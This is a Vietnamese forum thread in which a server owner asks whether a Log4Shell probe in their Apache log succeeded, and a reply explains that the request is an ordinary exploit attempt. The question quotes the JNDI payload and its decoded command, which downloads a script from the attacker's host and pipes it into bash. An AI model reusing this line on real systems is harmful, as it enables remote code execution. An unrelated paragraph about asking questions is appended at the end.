Điểm:0

khai thác log4j thành công hay chỉ là lưu lượng truy cập bình thường

lá cờ us

Đầu tiên, cảm ơn trước và xin lỗi nếu tôi hỏi một số điều thực sự ngớ ngẩn, đây không phải là chuyên môn của tôi :)

Tôi có một máy chủ web chỉ để kiểm tra những thứ của mình. Tuần trước tôi đã kiểm tra xem log4j CVE có dễ bị tấn công hay không và có vẻ như chỉ Jenkins đang sử dụng một số dấu vết của log4j nhưng bên trong slf4j (https://www.slf4j.org/log4shell.html) dường như không dễ bị tổn thương trên phiên bản đó.

/var/lib/jenkins/plugins/ssh-slaves/WEB-INF/lib/log4j-over-slf4j-1.7.26.jar

Tôi đã cập nhật mọi thứ có thể để đảm bảo an toàn. Tôi đã để nó ở đó nhưng hôm nay tôi đang loay hoay với nhật ký apache và tôi bắt đầu thấy các mục như thế này:

195.54.160.149 - - [26/Dec/2021:10:43:35 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/longbase64HERE} HTTP/ 1.1" 200 90

Lưu ý: base64 đã chỉnh sửa sau khi được giải mã giống như:

(curl -s 195.54.160.149:5874/MYIP:443||wget -q -O- 195.54.160.149:5874/MYIP:443)|bash

Tôi đã chạy một số tập lệnh để phát hiện xem có thêm dấu vết của log4j trên máy chủ của mình hay không, nhưng mọi thứ dường như rõ ràng. Tôi có nên lo lắng rằng máy chủ đang phản hồi với mã 200 không? Cảm ơn

Chris avatar
lá cờ it
Dòng nhật ký bạn hiển thị là một nỗ lực *bình thường* để khai thác lỗ hổng. Mã phản hồi 200 không có nghĩa là lần thử nhất thiết phải thành công. Bạn thấy mã phản hồi 200 vì trang web của bạn (giống như hầu hết các ứng dụng) không kiểm tra các tham số truy vấn không hợp lệ và thay vào đó, trang web âm thầm bỏ qua chúng.

Đăng câu trả lời

Hầu hết mọi người không hiểu rằng việc đặt nhiều câu hỏi sẽ mở ra cơ hội học hỏi và cải thiện mối quan hệ giữa các cá nhân. Ví dụ, trong các nghiên cứu của Alison, mặc dù mọi người có thể nhớ chính xác có bao nhiêu câu hỏi đã được đặt ra trong các cuộc trò chuyện của họ, nhưng họ không trực giác nhận ra mối liên hệ giữa câu hỏi và sự yêu thích. Qua bốn nghiên cứu, trong đó những người tham gia tự tham gia vào các cuộc trò chuyện hoặc đọc bản ghi lại các cuộc trò chuyện của người khác, mọi người có xu hướng không nhận ra rằng việc đặt câu hỏi sẽ ảnh hưởng—hoặc đã ảnh hưởng—mức độ thân thiện giữa những người đối thoại.